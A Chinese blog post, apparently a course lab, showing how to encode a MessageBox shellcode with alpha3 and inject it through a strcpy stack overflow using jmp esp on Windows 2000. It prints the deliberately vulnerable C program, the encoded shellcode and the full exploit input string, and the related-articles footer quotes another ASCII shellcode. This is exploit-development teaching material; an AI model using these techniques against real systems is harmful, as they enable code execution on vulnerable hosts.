使用alpha3编码shellcode

最新推荐文章于 2023-06-02 14:19:26 发布
最新推荐文章于 2023-06-02 14:19:26 发布
阅读量1.7k 收藏 5
点赞数 1
分类专栏: Courses 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lurenyi0724/article/details/113804616
版权

使用alpha3进行编码shellcode,生成一段没有坏字符的shellcode。然后使用jmp esp进行shellcode注入。
环境:win2000
工具:ollydbg,vc6,010editor

原程序

原程序为example.cpp。

#include <stdio.h>
#include <windows.h>
#include <string.h>

void hack(const char* input)
{
    char buf[10];
    
    LoadLibrary("user32.dll");//使用user32.dll中的弹框MessageBoxA
    strcpy(buf, input);//缓冲区溢出,利用jmp esp进行注入
}
int main(int argc, char* argv[])
{
	hack(argv[1]);
    return 0;
}

使用vc6进行编译后,生example.exe。

生成shellcode

这是一个弹窗的机器码,生成机器码的过程是先写一个c源码,然后再编译后,从od中复制得到机器码。

其中机器码可以利用010editor进行输入,下面是其中的内容。

因为这里shellcode的生成不是重点,而且存在某些地址在不同环境下可能不同,所以只是用作示例。了解到它的作用只是弹窗就可以了。

对shellcode进行编码

Shellcode编码技术 - 先知社区

alpha2/3可以用来将shellcode进行编码,以达到减少或清除坏字符的目的。

github上
SkyLined/alpha3: Alphanumeric shellcode encoder.

对alpha3有相当的介绍。
使用alpha3生成alphanumeric shellcode - 简书
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南_HiTaQini-CSDN博客

在上述第三篇中,提供了编译后的alpha3,下载后可以直接使用。
https://github.com/TaQini/alpha3

使用下述的命令对shellcode进行编码。

其中为什么这里使用esp,而不是eax,或者ebx等。我们先来看看实验的原理。当执行完jmp esp后,eip也就指向了shellcode的起始位置,那么根据上述文章中提到的 “而查看ida中返回编的代码可知调用shellcode的汇编指令是call eax 所以base 就是EAX” ,可以知道此时这里的esp就相当于call eax中的eax,jmp esp相当于call eax。

执行后的shellcode就是

TYhffffk4diFkDql02Dqm0D1CuEE2C4s4o0t0w174t0c7L0Q2u0R0S1l2u0R100S3W3d120b2E0c3z0X0n3C7K8M350c3z4J5p3G2D8L0h03
实验验证

根据jmp esp的原理,对exploit进行填充,如下。复制的时候可能会出现某些字符发生错误。下面的图片进行对比shellcode内容。

1111111111111111*汊wTYhffffk4diFkDql02Dqm0D1CuEE2C4s4o0t0w174t0c7L0Q2u0R0S1l2u0R100S3W3d120b2E0c3z0X0n3C7K8M350c3z4J5p3G2D8L0h03

在win2000中运行下。可以看到弹窗已经出现。

本文重点在于对于jmp esp时,使用alpha2/3编码时选择的base是esp。

木欣欣粉皮
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
alpha2 shellcode解密的vbs脚本
09-06
'说明:只针对alpha2的TYIIIIIIIIIIIIIIII这样的加密来解密,没有做更多的容错处理,只是解出下载url的exe地址。一般情况下该url的加密字符串是RHptd4之后的字符(去掉最后4个字符)。
iso-alpha3:将其他列添加到包含标准ISO 3166-1 alpha-3国家_地区代码的CSV中
04-30
用三个字母的国家/地区代码对CSV编码 给定输入的CSV,此JS脚本将输出带有包含国家/地区代码的其他列的新CSV。 安装 需要npm,凉亭和咕unt声。 要安装必要的程序包并启动Express服务器,请执行以下操作: npm install && bower install grunt 将浏览器指向开始。
ALPHA-2 和 ALPHA-3和ALPHA-NUM对照表
我要的光荣哪怕只有一秒
06-02 529
ISO 3166 的目的是定义国际公认的字母和/或数字代码,我们在提及国家及其分支机构时可以使用这些代码。但是,它没有定义国家名称——此信息来自联合国来源(术语公报国家名称和联合国统计部门维护的统计用途国家和地区代码)。使用代码可以节省时间并避免错误,因为我们可以使用全世界都能理解的字母和/或数字组合,而不是使用国家名称(国家名称会根据所使用的语言而变化)。
关于利用alpha3生成可打印shellcode的报错的解决
Probeginner的博客
06-01 390
最开始python sc.py > shellcode执行这条语句老出错, 这后来又是winhex下载又是VMtool安装的,太麻烦的,最后机缘巧合,发现这样可以成功: 直接git clone 而后用python3而不是python2去运行sc.py而后直接 python ./ALPHA~~
纯ascii的shellcode编写
ling
01-18 7401
上次ssctf决赛出现了一次纯ascii的shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIXYJKMK9ICD6DJT019BOB47P1YYE4LK2Q6PLK2VDLLKD6ELLKQVDHLK3N10LKWFGH0OR8SEJS1IS1N1KOM13PLKRLFD7TLKW5WLLK0TGXRXS1Z
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5074
ascii shellcode : 自动生成shellcode,手写shellcode
Shellcode编码技术
2301_77498991的博客
04-28 658
也就是我们在执行真正的costom_decoder之前将esp调整到nSEH之前,和costom_decoder本身之前,留下足够的opcode空间。因此,我们用0减去re_opcode,就可以得到opcode,为什么用减法而不是加法直接得到opecode呢,以eax为例,sub eax, xx指令是‘\x2d'合法的,而add eax, xx是”\x81\xC0“。为了更好的确定地址,我们将egg hunter放在payload的首,在nSEH处跳到调整edx的代码。所以egg hunter是可行的。
Shellcode 开发关键技术
AlexYoung28的博客
10-15 1279
1. 位置代码无关性技术 定义:位置无关代码(PIC)是指不适用硬编码地址来寻址指令或数据的代码。 必要性:因为Shellcode被加载到内存地址执行时,指令的内存地址是不确定的。 2.如何获取Shellcode起始位置 Shellcode在以位置无关方式访问时,首先需要引用一个 基址指针,用该基址指针加上或减去一定的偏移,从而顺利 的访问shellcode中包含的数据。  Shel...
PWN:[Week1]safe_shellcode
m0_53932372的博客
10-19 522
pwn
alpha2 shellcode加密(转字符串)VC2008工程
11-23
国外大牛开发的把shellcode全部转为字符串并且能正常运行的加密码算法,非常牛,因为网络上很难找到,本来通过收集网络上的alpha2算法片段拼凑出来的完整版,听说有alpha3了但感觉这个够用了,特来分享我的百度博客: http://hi.baidu.com/icelphi
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件...
用于解码基于Alpha2的shellcode的Rust命令行工具。-Rust开发
05-27
alpha_decoder是用于解码基于Alpha2的shellcode的Rust命令行工具。 alpha_decoder alpha_decoder是用于解码基于Alpha2的shellcode的Rust命令行工具。 支持的格式混合大小写ASCII大写ASCII混合大小写Unicode大写...
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
Custom Shellcode
最新发布
05-16
Custom Shellcode 代码参考.
金融开放度指数-世界银行三位数字编码、ISO Alpha-3 Code等多指标数据
li514006030的博客
11-27 1270
金融开放度指数-世界银行三位数字编码、ISO Alpha-3 Code等多指标数据
AlphaCode论文精读
qq_36936443的博客
06-25 514
论文标题:《Competition-Level Code Generation withAlphaCode下载地址:https://storage.googleapis.com/deepmind-media/AlphaCode/competition_level_code_generation_with_alphacode.pdf DeepMind 发表于2022年2月19号 AlphaCode在OpenAI的CodeX工作的基础上前进了一大步,运行有更长的文档
重构、插件化、性能提升 20 倍,Apache DolphinScheduler 2.0 alpha 发布亮点太多!
Apache DolphinScheduler开源社区
10-29 777
点击上方蓝字关注我们社区的小伙伴们,好消息!经过 100 多位社区贡献者近 10 个月的共同努力,我们很高兴地宣布 Apache DolphinScheduler 2.0 alpha 发...
helm3 安装 postgresql 高可用数据库(全网首发:包含k8s、nfs、storageclass安装步骤)
zhiboqingyun的博客
04-19 3576
一、资源准备 (所有机器上执行) | 主机名 | 公网 IP | 私网 IP | |–|–|–|–| | k8s-master01 | 39.104.173.77 |172.24.114.3| | k8s-node01 | 39.104.179.210|172.24.114.4| | k8s-node02 | 39.104.173.12 |172.24.114.1| | k8s-node03 | 39.104.177.2 |172.24.114.2| 更改主机名 # 在虚拟机 172.24.114
基于ROS的Most Stars开源代码汇总(自动驾驶汽车+RGBDSLAMv2+ROS2+人识别与跟踪等)
热门推荐
zhangrelay的专栏
05-12 2万+
Star 200+https://github.com/CPFL/Autoware用于城市自主驾驶的开源软件。 http://www.tier4.jp/Autoware用于城市自主驾驶的集成开源软件,由第四层维护。支持以下功能:3D本地化3D映射路径规划路径跟随加速/制动/转向控制数据记录汽车/行人/物体检测交通信号检测交通灯识别车道检测对象跟踪传感器校准传感器融合面向云的地图连接自动化智能手机导
shellcode编码
06-06
"b'shellcode编码'"的意思是带有"b"前缀的字节字符串,其中包含了一个shellcode编码Shellcode是一段用汇编语言编写的二进制代码,通常用于利用计算机系统中的漏洞,从而实现攻击的目的。编码是一种对数据进行转换的过程,常用于网络传输或存储数据。因此,"b'shellcode编码'"指的是对shellcode进行编码后的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值